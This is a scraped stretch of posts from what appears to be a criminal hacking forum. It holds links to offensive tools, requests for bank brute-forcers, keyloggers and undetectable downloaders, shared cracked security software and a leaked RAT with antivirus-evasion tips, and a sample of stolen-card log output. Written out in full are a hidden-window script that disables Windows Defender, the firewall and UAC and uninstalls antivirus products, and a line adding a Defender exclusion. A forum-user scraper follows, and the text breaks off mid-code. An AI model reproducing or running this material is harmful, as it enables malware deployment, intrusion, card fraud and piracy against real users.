](https://github.com/Shellntel/scripts/blob/master/Invoke-SMBAutoBrute.ps1)
Contribute to shellntel-acct/scripts development by creating an account on GitHub.
github.com
Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit! ](https://github.com/0x27/CiscoRV320Dump)
CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit! - 0x27/CiscoRV320Dump
github.com
![gist.github.com](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgist- og- image-54fd7dc0713e.png&hash=3c443d37e802be4e12ebf9a55c2a4385&return_error=1)
Script Alias) ](https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2)
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias) - comexec.cna
gist.github.com
](https://github.com/hfiref0x/UACME/)
Defeating Windows User Account Control. Contribute to hfiref0x/UACME development by creating an account on GitHub.
github.com
[ https://raw.githubusercontent.com/rapid7/metasploit- omnibus/master/config/templates ](https://raw.githubusercontent.com/rapid7/metasploit- omnibus/master/config/templates)
attacks and MitM ](https://github.com/sensepost/mana)
DEPRECATED mana toolkit for wifi rogue AP attacks and MitM - sensepost/mana
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F693e3c77e06365e5c2eda23887ae98dd6be2bb6dc373d3be31b38bc1b6fed8e8%2Fdanilabs%2Fscripts- nse&hash=e22cd143d0ac701d46f292d6f08c8123&return_error=1)
](https://github.com/DaniLabs/scripts-nse/blob/master/README.md#huawei- hg253s-v2)
Some NSE scripts to search information from routers - danilabs/scripts-nse
github.com
framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. ](https://github.com/Raikia/FiercePhish)
FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. - Raikia/FierceP...
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F28f4f6b91460400cafeb2206076262025776f3ca8436add9e1f31d55c36a29f0%2Frvrsh3ll%2FMisc- Powershell-Scripts&hash=acb97b7386a5ca1b5e924d62a2595c5f&return_error=1)
Powershell-Scripts ](https://github.com/rvrsh3ll/Misc-Powershell- Scripts/blob/master/Get-BrowserData.ps1)
Random Tools. Contribute to rvrsh3ll/Misc-Powershell-Scripts development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F0525e62346e1efc4b2315ba1d0ef20d42bab40058a6fa794e272cf930ea30ff7%2FHaraldWalker%2Fuser- agent-utils&hash=1cab97552770137b90c87854a2113d6a&return_error=1)
agent strings. Can be used to handle http requests in real-time or to analyze log files. ](https://github.com/HaraldWalker/user-agent-utils)
Utilities for processing user-agent strings. Can be used to handle http requests in real-time or to analyze log files. - GitHub - HaraldWalker/user- agent-utils: Utilities for processing user-agent...
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Ff609b8106f8d25a5863481ca9e80132bf27255e8aa039a83fe1ddfa5d7463bec%2FHarmJ0y%2FMisc- PowerShell&hash=e9799e40dac600067ca74fe9e45f5f60&return_error=1)
PowerShell ](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke- WdigestDowngrade.ps1)
Misc. PowerShell scripts. Contribute to HarmJ0y/Misc-PowerShell development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F61678850%2Fb345f180-936b-11e9-90b0-fe4327e9525b&hash=253bd642e9e67e6490d500a8a863c6e7&return_error=1)
Attacking SQL Server ](https://github.com/NetSPI/PowerUpSQL)
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server - NetSPI/PowerUpSQL
github.com
modular and portable cryptographic toolkit that provides developers with a vast array of well known published block ciphers, one-way hash functions, chaining modes, pseudo-random num ](https://github.com/libtom/libtomcrypt)
LibTomCrypt is a fairly comprehensive, modular and portable cryptographic toolkit that provides developers with a vast array of well known published block ciphers, one-way hash functions, chaining ...
github.com
](https://github.com/libssh2/libssh2)
the SSH library. Contribute to libssh2/libssh2 development by creating an account on GitHub.
github.com
HTML, plain text, and JSON (w/CORS!) ](https://github.com/natevw/ipcalf)
Gives back your public IP address in plain HTML, plain text, and JSON (w/CORS!) - natevw/ipcalf
github.com
an unmanaged process ](https://github.com/leechristensen/UnmanagedPowerShell)
Executes PowerShell from an unmanaged process. Contribute to leechristensen/UnmanagedPowerShell development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F6411224%2F5b357100-b5f7-11ea-979d-bb7e7747c24d&hash=5f05c07c57556f9d380076fc800162ee&return_error=1)
extracting 7-Zip archives ](https://github.com/thoemmi/7Zip4Powershell)
Powershell module for creating and extracting 7-Zip archives - thoemmi/7Zip4Powershell
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F50ca2c017193712f6071fea28c0eacaa398eefe7398fe4f0b4471c4080f2b7e5%2FMr- Un1k0d3r%2FCatMyPhish&hash=f25f7bc4c099cb6b662a2713fd3ab539&return_error=1)
](https://github.com/Mr-Un1k0d3r/CatMyFish)
Search for categorized domain. Contribute to Mr-Un1k0d3r/CatMyPhish development by creating an account on GitHub.
github.com
Principal Applied Security Researcher (prev IR Consultant) - danielbohannon
github.com
https://github.com/vysec/Invoke-DNSDiscovery
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F52372be2ea6b25f74889720e0df8e3c028ff5e09b19aa3b80e2fdd3f2712d630%2Fcloud- sw-zhang%2Ftest1&hash=82457b566d5586e63b7125568a5927a4&return_error=1)
b4e4c6a29aba177b9272724a4a09e5920ab6dec4 · cloud-sw-zhang/test1 ](https://github.com/cloud-sw- zhang/test1/blob/b4e4c6a29aba177b9272724a4a09e5920ab6dec4/PSV/Test_PSV-2018-0074.py)
test ssh. Contribute to cloud-sw-zhang/test1 development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F28f4f6b91460400cafeb2206076262025776f3ca8436add9e1f31d55c36a29f0%2Frvrsh3ll%2FMisc- Powershell-Scripts&hash=acb97b7386a5ca1b5e924d62a2595c5f&return_error=1)
Scripts ](https://github.com/rvrsh3ll/Misc-Powershell- Scripts/blob/master/RunAs.ps1)
Random Tools. Contribute to rvrsh3ll/Misc-Powershell-Scripts development by creating an account on GitHub.
github.com
![gist.github.com](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgist- og- image-54fd7dc0713e.png&hash=3c443d37e802be4e12ebf9a55c2a4385&return_error=1)
](https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2)
GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
https://github.com/berzerk0/Probable-WordlistsI
open source, large integer arithmetic library written in portable ISO C. ](https://github.com/libtom/tomsfastmath)
TomsFastMath is a fast public domain, open source, large integer arithmetic library written in portable ISO C. - libtom/tomsfastmath
github.com
proxies ](https://github.com/proxytunnel/proxytunnel)
Stealth tunneling through HTTP(S) proxies. Contribute to proxytunnel/proxytunnel development by creating an account on GitHub.
github.com
steal NTML hashes from a remote computer. Do not use this for illegal purposes.The author does not keep responsibility for any illegal action you do. ](https://github.com/0x09AL/WordSteal)
This script will create a POC that will steal NTML hashes from a remote computer. Do not use this for illegal purposes.The author does not keep responsibility for any illegal action you do. - GitH...
github.com
samratashok/nishang ](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke- ADSBackdoor.ps1)
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
github.com
PowerShellMafia/PowerSploit ](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out- Minidump.ps1)
PowerSploit - A PowerShell Post-Exploitation Framework - PowerShellMafia/PowerSploit
github.com
![gist.github.com](/proxy.php?image=https%3A%2F%2Fgithub.githubassets.com%2Fassets%2Fgist- og- image-54fd7dc0713e.png&hash=3c443d37e802be4e12ebf9a55c2a4385&return_error=1)
Script/Sleep ](https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2)
How to add a popup handler to a Swing component in Aggressor Script/Sleep - mouse.cna
gist.github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Ff0d3727489fb29a032bbab16e3f6decede1304146eacc2226f16266e6f2356f5%2FMr- Un1k0d3r%2FSCT- obfuscator&hash=53278926c888dab59b9973e9742069df&return_error=1)
obfuscator ](https://github.com/Mr-Un1k0d3r/SCT-obfuscator)
Cobalt Strike SCT payload obfuscator. Contribute to Mr-Un1k0d3r/SCT-obfuscator development by creating an account on GitHub.
github.com
will help do live incident response and enumerate autoruns artifacts that may be used by legitimate programs as well as malware to achieve persistence. ](https://github.com/p0w3rsh3ll/AutoRuns)
🚀AutoRuns is a PowerShell module that will help do live incident response and enumerate autoruns artifacts that may be used by legitimate programs as well as malware to achieve persistence. - p0w3...
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F8864897cfba6edccf290bdb8edeacdc0a69256a611e42412bf5b93cf77bd4b79%2Fcldrn%2Fexternal- nse-script-library&hash=7ead7eb3aba375935f8e228a8a40e33e&return_error=1)
664a7b5891251051b910bdaf76f396e250d33348 · cldrn/external-nse-script-library ](https://github.com/cldrn/external-nse-script- library/blob/664a7b5891251051b910bdaf76f396e250d33348/http-vuln- cve2018-10824.nse)
External NSE script library (Collection of unofficial scripts) - Feel free to submit your NSE scripts! - cldrn/external-nse-script-library
github.com
https://github.com/mwrlabs/peas'
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fd4e39c68e7809941c970932fbd533e857c7ae496d321462273725c2e7d1dfeb3%2Ft6x%2Freaver- wps-fork-t6x&hash=738cd7418701673830a8dcd1f82d91e4&return_error=1)
fork-t6x)
Contribute to t6x/reaver-wps-fork-t6x development by creating an account on GitHub.
github.com
is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. ](https://github.com/stephenfewer/ReflectiveDLLInjection)
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. - stephenfe...
github.com
Can anyone make .lnk or .img FUD downloader?
Ищу кодера кто напишет брут ( под банки которые мне нужны )
К сожалению как пример не могу дать банк ( чтобы зайти в онлик )
Приват кипер не интересен
Бюджет готов обсуждать ( лишь бы софт не наебнулся через 2 дня )
А так - же буду рад если кто - то посоветует кого - нибудь .
А так - же если есть готовые варианты готов рассмотреть ( если это реально
стоящее, а не софт который умирает )
Приветствую товарищи, нужен софт по мониторингу авито и выявлению объявлений пока оно еще находится на модерации, слышал что уже существует данный софт, но не могу найти.
Есть ли возможность отключения DPI на стороне роутера?
Burp Suite Professional v2021.8.3 + Crack + Video Manual Installation
Released 15 September 2021
](https://www.virustotal.com/gui/file/ce6663874f86136a7cd782d93fa40b06e2cf156c70b5f387e13a22c2c4d85d47)
VirusTotal
www.virustotal.com
You must have at least 5 reaction(s) to view the content.
Acunetix v24.6.240626115 - 27 Jun 2024
Windows: <https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.6.240626115-Windows- Pwn3rzs-CyberArsenal.rar>
Linux: <https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.6.240626115-Linux- Pwn3rzs-CyberArsenal.7z>
Password: Pwn3rzs
Changelog:
Too long for a post, refer here:
Release build 24.6.240626115 includes improved detection of DOM XSS vulnerabilities, , security features, improvements, and bug fixes.
![www.acunetix.com](/proxy.php?image=https%3A%2F%2Fwww.acunetix.com%2Fwp- content%2Fthemes%2Facunetix%2Fico%2Fchrome-touch- icon-196x196.png&hash=30a0fb203c3dbd0416c5555a5f4433b4&return_error=1) www.acunetix.com
You must have at least 30 reaction(s) to view the content.
Core Impact 20.3+Crack+Update
Discover how the powerful penetration testing solution, Core Impact, enables you to safely and efficiently test your environment by automating the techniques used by hackers. Get started today with this pen testing solution that is ideal for both new and advanced pen testers.
www.coresecurity.com
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/eS4F0ZiL#SS5-HQ8qzgHb5IxfaDYy8PZ2XJBdUlopiOvg-NDvr3o)
mega.nz
Всех приветствую. Ищу кейлоггер для пентеста. Нужно выловить пароль админа сети. Куплю или если есть люди с душой, которые скинут или подскажут хороший паблик вариант.
Luhn алгоритм.
Доставка лога в телеграм.
Code:Copy to clipboard
PAPA JOHNS PIZZA 🍕
💳: 0000 0000 0000 0000
📆: 04
📅: 2030
🔐: 529
👤: Name Name
🏚: Street 28
](https://anonfiles.com/t8zfd36bzc/papa_johns_zip)
anonfiles.com
Password:
You must have at least 5 message(s) to view the content.
Today, I will be sharing with you a comprehensive script designed to disable a broad range of security features in a Windows environment, including both native Windows services and third-party security solutions.
This script is intended strictly for educational purposes, to illustrate how various Windows security features operate and can be manipulated. It is strongly advised against using this script in a live, production environment, as it will significantly reduce the security posture of the system, leaving it vulnerable to potential threats.
Now let's dive into the details:
The script starts by defining a list of services to disable. These services include those related to Windows Defender, Windows Firewall, Credential Manager, Software Protection, and more.
Following that, a range of registry keys under** _ 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'** and **' HKLM:\System\CurrentControlSet\Services\Netman'_** are modified to disable various features of Windows Defender and network connections.
Next, the script identifies a list of third-party security applications like McAfee, AVG, Symantec, Webroot, and others , and attempts to uninstall them. This is achieved using the WMI (Windows Management Instrumentation) interface to find and uninstall these applications.
In the final steps, the script disables the User Account Control (UAC) and various Windows Defender features, once again by manipulating registry keys and using PowerShell commands.
Here's the twist - the script is designed to run silently. It achieves this by using the " -WindowStyle Hidden" option for the PowerShell process, and redirecting all output to null ( > $null). This means the script will run in a hidden window, and suppress all output, making its activities invisible on the surface. However, do note that some operations like uninstalling applications may still cause visible activities or prompts.
The script can be modified as you see fit.
Disabling security services will expose the system to potential threats, so it 's crucial to understand the implications of each step in the script below.
Stay curious, and keep learning!
Code:Copy to clipboard
@echo off
powershell.exe -WindowStyle Hidden -Command "
$windowsServices = @(
'WdBoot',
'WdFilter',
'WdNisDrv',
'WdNisSvc',
'WinDefend',
'SecurityHealthService',
'mpssvc',
'SharedAccess',
'KeyIso',
'VaultSvc',
'sppsvc',
'CertPropSvc',
'SCPolicySvc'
)
foreach ($service in $windowsServices) {
Set-Service -Name $service -StartupType 'Disabled' > $null
}
$registryPaths = @(
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet',
'HKLM:\System\CurrentControlSet\Services\Netman'
)
$registryValues = @{
'DisableAntiSpyware' = 1;
'DisableAntiVirus' = 1;
'MpEnablePus' = 0;
'DisableBehaviorMonitoring' = 1;
'DisableIOAVProtection' = 1;
'DisableOnAccessProtection' = 1;
'DisableRealtimeMonitoring' = 1;
'DisableScanOnRealtimeEnable' = 1;
'DisableEnhancedNotifications' = 1;
'DisableBlockAtFirstSeen' = 1;
'SpynetReporting' = 0;
'SubmitSamplesConsent' = 0;
'Start' = 4;
}
foreach ($path in $registryPaths) {
if (!(Test-Path -Path $path)) { New-Item -Path $path -Force > $null }
foreach ($key in $registryValues.Keys) {
New-ItemProperty -Path $path -Name $key -Value $registryValues.$key -PropertyType 'DWORD' -Force > $null
}
}
$programs = @(
'Webroot SecureAnywhere',
'Symantec Endpoint Protection',
'AVG 2015',
'McAfee VirusScan Enterprise',
'McAfee Agent',
'McAfee DLP Endpoint',
'McAfee Endpoint Security Platform',
'McAfee Endpoint Security Threat Prevention',
'Microsoft Security Client',
'Malwarebytes Managed Client',
'Sophos System Protection',
'Sophos AutoUpdate',
'Sophos Remote Management System',
'McAfee SiteAdvisor Enterprise',
'Symantec Backup Exec Remote Agent for Windows',
'ESET File Security',
'Norton AntiVirus',
'Kaspersky Anti-Virus',
'Avast Antivirus',
'Bitdefender Antivirus'
)
foreach ($program in $programs) {
$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $program }
if ($app) { $app.Uninstall() > $null }
}
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0
Set-MpPreference -DisableRealtimeMonitoring $true > $null
Uninstall-WindowsFeature -Name Windows-Defender -Quiet -Restart > $null
" > $null
Вижу что много и часто на форумах ищут кряки какого-то софта. Нашёл у себя старый пак ратников. Вроде как 31 шт внутри. Понимаю что шлак и все они не вывозят в своей работе по сравнению с новыми софтами,но вдруг кому интересно поковырять данные софты для общего понимания. Если кому такое интересно - дайте фидбек в комменты. Есть ещё разные софты,книги,фиши и приватные обучения которые покупал для себя
https://transfer.sh/jac4y0/rat 31.rar пасс xss.is
Есть у кого-то такой чекер? Что-бы искал валидные шопы CMS opencart.
Поделитесь пожалуйста.
Спасибо.
Всем привет нужен софт Wondershare Recoverit Pro (Premium)
есть ли у кого, поделитесь.
в интернет нашёл crack версии. но не работает
спасибо!
hi everyone i need software Wondershare Recoverit Pro (Premium)
if anyone has, share with me
i found some crack versions, but it does not work
thanks!
i need decryptor for chaos ransomware please help
Не обязательно не должны показываться вирусы (но если есть такой, то я был бы рад). Главное чтобы он был бесплатный и в него можно что - то вшить.
Hello xss fam <3 , today I am sharing ufed4pc 7.69 setup + crack + keygen.
Intro : The UFED (Universal Forensics Extraction Device) is a product series of the Israeli company Cellebrite, which is used for the extraction and analysis of data from mobile devices by law enforcement agencies.
Install guide: ( turn off internet completely).
First: install the setup
Second: copy-paste the crack files into install folder, after that run the “blockhost.bat” by admin (u can check this by text editor)
Third: run the “innerloader.exe” from the install file, you will get a hwid,
Fourth: now run the “keygen.exe”, paste (ctrl+v) the hwid in the “hardware id” section. After that a license will given, just copy it and paste into install folder.
Finally, your ufed4pc is activated
setup: https://www.mediafire.com/file/j7kso779nfc0g55/Setup+UFED+7.69-orion.zip/file
crack: https://drive.filen.io/d/7e28326d-72e6-4017-ab75-16ff342ef8a1#nPO5ArVNajUgmKypMEhHubOBzb1ZpQhx
Download Link - https://www.upload-4ever.com/i9kbhprphjsz
Today I'm leaking Sheet Rat
Recommended to start on vm/vps
To get source use dnspy (I'm lazy as hell)
Joiner doesn't work
Pass FORXSSIS
Rat
Tutorial how to get 2 detects at avcheck
Make a build but without anything at obfuscation
Go to obfuscation app and turn off everything except the ProxyCall CtrlFlow
(Enable assembly by choice)
Spoiler: photo
Как убрать с винды данные о подключённых ранее устройствах?
Нужно чтобы никаким (из доступных паблику хотя бы) софтом нельзя было узнать,
что подключались флешки и телефоны к пк.
Гугл говорит, что все эти данные хранятся в реестре и достаточно почистить в
нем записи. Где-то помимо реестра эти данные сохраняются?
Нужно мнение кто разбирается!
Привет. Может завалялось у кого. Ищу типовую конфигурацию 1с предприятие, желательно посвежее. Буду благодарен всем кто поделится.
2021
Spoiler: Что нового:
**Скачать:https://wdfiles.ru/a52d85
Пока что без кряка, выложу сюда, как появится**
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
I would like to share with you an old version of the floods.
There are 2 versions in total - one for ipv4 and the other for ipv6
Link - https://dropmefiles.com/kAPqb
VT -
youk
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Ffd7de9093e9fcebb3c860230c657045435174b818ce71ac52c012ffb434d281c%2FEvilBytecode%2FEDR- XDR-AV-Killer&hash=756949b0bf98f7b54abeac29dec0f4e3&return_error=1)
which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver ](https://github.com/EvilBytecode/EDR-XDR-AV-Killer)
Reproducing Spyboy technique, which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver - EvilBytecode/EDR-XDR-AV-Killer
github.com
The driver contains some protectiion mechanism that only allow trusted Process IDs to send IOCTLs, Without adding your process ID to the trusted list, you will receive an 'Access Denied' message every time. However, this can be easily bypassed by sending an IOCTL with our PID to be added to the trusted list, which will then permit us to control numerous critical IOCTLs
exec.Command("powershell", "-Command", "Set-MpPreference -ExclusionExtension *.sys -Force").Run()
ребят нужна проога которая ищет строки ходя по логам, пользовался хорошей называлась диаманд вроде.
Monero Javascript Miner for Server / Website / Hosting
Удачи всем!
Парни, подскажите простой инструмент для клона каналов открытых. Или как сделать так чтобы мой бот мониторил чужой открытый канал и мог пересылать из него сообщения? Ведь я не могу сделать его админом канала и даже подписать своего бота на чужой канал.
Discord Hacking Tool
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F150d10d79c0c74677995a701344d171c153ce189192825579815114cc93eed4a%2FAastraaDev%2FDiscord- Hacking-Tool&hash=4b9f4881f99518a1f58313645a6d8967&return_error=1)
](https://github.com/AastraaDev/Discord-Hacking-Tool)
Contribute to AastraaDev/Discord-Hacking-Tool development by creating an account on GitHub.
github.com
Hidden content for authorized users.
https://github.com/MendozaMiguel/checkAccountNetflix[/ HIDE]
Cobalt Strike - это платформа для моделирования противника и операций red team. Продукт предназначен для целевых атак и имитации пост-эксплуатационных действий злоумышленников. В этом разделе описывается процесс атаки, поддерживаемый набором функций Cobalt Strike'a. В остальной части данного руководства эти функции рассматриваются подробно.
скачал я как то прогу, антивир показывает что там мальварь "OpenGates PUP".
что за хрень такая?
Ребята, подскажите пожалуйста как ip телефонию использовать для колл-центра ,что бы до фига бумаг не просили .Кроме РФ.
подскажите, какая версия на 10 ке с магазина встает по такому пути?
C:\Program Files\WindowsApps\Microsoft.Office.Desktop.Word_16051.17425.20176.0_x86__8wekyb3d8bbwe\Office16\WINWORD.exe
Сорян не знал какой раздел правильно выбрать, по этому здесь
Сначала своими словами:
Софт парсит всех пользователей с форумов на самом популярном движке XenForo.
Протестирован на ряде крупных форумов.
Не знаю, на сколько будет этично выложить источник и результаты, но с очень популярного и крупного форума за пару часов в 100 потоков спарсил список всех юзеров. Форум забугор, не наша тематика.
А теперь официальное описание:
Этот скрипт предназначен для автоматизированного парсинга форумов с целью извлечения логинов пользователей. Он реализует многопоточный подход для увеличения производительности и поддерживает работу через прокси-серверы, что делает его полезным для обхода ограничений по IP или увеличения приватности.
Загрузка страниц с поддержкой прокси
Скрипт позволяет загружать страницы форума через указанные прокси-серверы
(поддерживаются SOCKS5 прокси). Это полезно для случаев, когда необходимо
обходить ограничения на запросы с одного IP-адреса или использовать анонимные
соединения. В случае недоступности прокси скрипт автоматически переключается
на прямое соединение.
Многопоточность
Для повышения скорости обработки скрипт использует многопоточность с помощью
модуля ThreadPoolExecutor. Пользователь может указать максимальное количество
потоков, что позволяет параллельно обрабатывать несколько страниц форума
одновременно, значительно ускоряя процесс парсинга.
Проверка прокси-соединений
Скрипт выполняет проверку работоспособности прокси перед началом работы. Это
гарантирует, что выбранный прокси корректно подключается и отвечает. Если
прокси не работает, пользователь может выбрать между продолжением работы без
прокси или попыткой подключения другого прокси-сервера.
Извлечение логинов пользователей
Основная задача программы — это поиск и сохранение логинов пользователей,
которые могут находиться на различных страницах форума. Логины извлекаются с
помощью библиотеки BeautifulSoup, которая анализирует HTML-страницы, находит
элементы с классом 'username' и сохраняет их в файл. Это полезно для сбора
данных о пользователях форума для дальнейшего анализа.
Обработка и сохранение данных
Все извлечённые логины сохраняются в указанный пользователем файл. Это
позволяет собирать и систематизировать данные для дальнейшего использования.
Файловая система не перезаписывает данные, а добавляет новые логины, избегая
дублирования.
Поиск ссылок на разделы и темы форума
Помимо логинов, скрипт также находит ссылки на разделы и темы форума. Это
позволяет перейти к следующему уровню глубины структуры форума и продолжать
парсинг новых страниц, расширяя охват данных.
Скрипт может быть полезен для различных целей, включая мониторинг активности на форумах, сбор данных для анализа пользовательской активности, или для создания собственных баз данных пользователей.
Код:
Code:Copy to clipboard
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor, as_completed
# Функция для загрузки страницы с поддержкой прокси
def fetch_page(url, proxies=None):
try:
response = requests.get(url, proxies=proxies)
response.raise_for_status() # Проверка на успешный запрос
return response.text
except requests.RequestException as e:
print(f"Ошибка при запросе страницы {url}: {e}")
return None
# Функция для проверки подключения к прокси
def check_proxy(proxies):
test_url = "https://httpbin.org/ip" # URL для проверки соединения
try:
response = requests.get(test_url, proxies=proxies, timeout=5)
response.raise_for_status()
print(f"Подключение к прокси успешно! Ваш IP через прокси: {response.json()['origin']}")
return True
except requests.RequestException as e:
print(f"Не удалось подключиться к прокси: {e}")
return False
def parse_forum_page(html):
soup = BeautifulSoup(html, 'html.parser')
links = set()
# Найти все ссылки на посты и разделы
for a_tag in soup.find_all('a', href=True):
href = a_tag['href']
if 'threads/' in href or 'forums/' in href:
links.add(href)
return links
def extract_usernames(html):
soup = BeautifulSoup(html, 'html.parser')
usernames = set()
# Предполагаем, что логины пользователей находятся в элементах с классом 'username'
for username_tag in soup.find_all(class_='username'):
usernames.add(username_tag.text.strip())
return usernames
def save_usernames(usernames, filename):
with open(filename, 'a', encoding='utf-8') as file:
for username in usernames:
file.write(f"{username}\n")
def process_link(link, base_url, visited_links, filename, proxies):
if link in visited_links:
return
visited_links.add(link)
print(f"Загрузка страницы {link}...")
page_html = fetch_page(base_url + link, proxies)
if not page_html:
return
usernames = extract_usernames(page_html)
if usernames:
print(f"Найдено {len(usernames)} логинов. Сохраняем в файл...")
save_usernames(usernames, filename)
return parse_forum_page(page_html)
def main():
# Запрашиваем параметры у пользователя
base_url = input("Введите URL форума (например, https://forum.info/): ").strip()
max_threads = int(input("Введите количество потоков (например, 100): ").strip())
filename = input("Введите имя файла для сохранения логинов (например, usernames.txt): ").strip()
# Запрашиваем прокси у пользователя
use_proxy = input("Использовать socks5 прокси? (y/n): ").strip().lower()
proxies = None
if use_proxy == 'y':
proxy_address = input("Введите адрес socks5 прокси (например, socks5://127.0.0.1:9050): ").strip()
proxies = {
'http': proxy_address,
'https': proxy_address
}
# Проверка подключения к прокси
if not check_proxy(proxies):
print("Переход на прямое соединение...")
proxies = None
visited_links = set()
print(f"Загрузка главной страницы форума {base_url}...")
main_page_html = fetch_page(base_url, proxies)
if not main_page_html:
return
links_to_visit = parse_forum_page(main_page_html)
with ThreadPoolExecutor(max_workers=max_threads) as executor:
future_to_link = {executor.submit(process_link, link, base_url, visited_links, filename, proxies): link for link in links_to_visit}
while future_to_link:
for future in as_completed(future_to_link):
link = future_to_link.pop(future)
try:
new_links = future.result()
if new_links:
for new_link in new_links:
if new_link not in visited_links:
future_to_link[executor.submit(process_link, new_link, base_url, visited_links, filename, proxies)] = new_link
except Exception as e:
print(f"Ошибка при обработке {link}: {e}")
print("Обработка завершена.")
if __name__ == "__main__":
main()
Скрин приложил
Задавался этим вопрос, но так и не нашёл на это ответ, пообщавшись с брутерами криптовалюты, то у 40% физические, а 60% арендуют, но не говорят где. Мне нужно, как минимум 50x4090rtx, а нигде столько не арендуешь, к сожалению
Всем привет. На днях хотел поставить TWRP для установки кастомной прошивки, но на мою версию прошивки я VBMETA не нашёл. Может плохо искал.. Почитал на 4pda, говорят "SA"-это номер прошивки (как U1, U2, U3, U4 и т.д.), но по поводу VBMETA никто внятного ответа так и не дал. Обращаюсь к вам, как к последнему оплоду надежды.
Также, давн грэйд, и прочие махинации я уже пробовал. Результат:
А) Просто не загружается в рекавери
Б) Вообще не загружается
В) (давн грейд) Ошибка в флеше lwdf.img (могу ошибиться в названии).
Заранее спасибо.
Генератор красивых адресов для сетей EVM (ETH)
Немного доработал и вынес из TRX генератора https://xss.is/threads/103260
Добавлено:
1. Поиск по первым символам
Приватный ключ:
1f0a8f4ab07ac6399aedeefb620642a171b6891564447c21721fc8223958cdb4
Адрес: 0x00000973F9BE5AdD8Ff0DC30302866c3106A7F32
2. Поиск по последним символам
Приватный ключ:
5b91e18a8f80560cb49db902e43c241773ac7c5ccee994ea0cd9afff25752c42
Адрес: 0x0CA17A48363dB04630FA5906Fb12b01636300000
3. Поиск по первым и последним символам
Приватный ключ:
be0f7aedf53efaf026db52d1c2bc7a7d399e0819e4d710bd0f85b77d04bcd2c3
Адрес: 0x0007A03b93DFCc91B60E6Fc25A5944745CA0bb00
4. Поиск по любой последовательности символов
Приватный ключ:
3774d6fdd13f7e363eeb644397c77c737e53d38be26e32efba4b03d01d740cce
Адрес: 0x887E65Ecf2648400000380116669Dda45cd52c6f
5. Поиск по рандомным, но последовательно повторяющимся символам
Приватный ключ:
df5b9655f81afc172a02480e0e9e9b51f2a05cad740b6a15214449b1a7091b88
Адрес: 0x363953ba86694D6825BdBa07d9e58444444422d3
Spoiler: Golang
Code:Copy to clipboard
package main
import (
"crypto/sha256"
"encoding/hex"
"fmt"
"os"
"strings"
"time"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/crypto"
)
type key struct {
privateKey string
addressHex string
attempts int
}
func main() {
var searchOption int
fmt.Println("")
fmt.Println("🦆 EVM Vanity Generator:")
fmt.Println("1. Поиск по первым символам")
fmt.Println("2. Поиск по последним символам")
fmt.Println("3. Поиск по первым и последним символам")
fmt.Println("4. Поиск по любой последовательности символов")
fmt.Println("5. Поиск по рандомным, но последовательно повторяющимся символам")
fmt.Print("⚡️Выберите опцию: ")
fmt.Scan(&searchOption)
var pattern string
switch searchOption {
case 1:
fmt.Print("Введите первые символы адреса (адреса начинаются с 0x): ")
fmt.Scan(&pattern)
case 2:
fmt.Print("Введите последние символы адреса: ")
fmt.Scan(&pattern)
case 3:
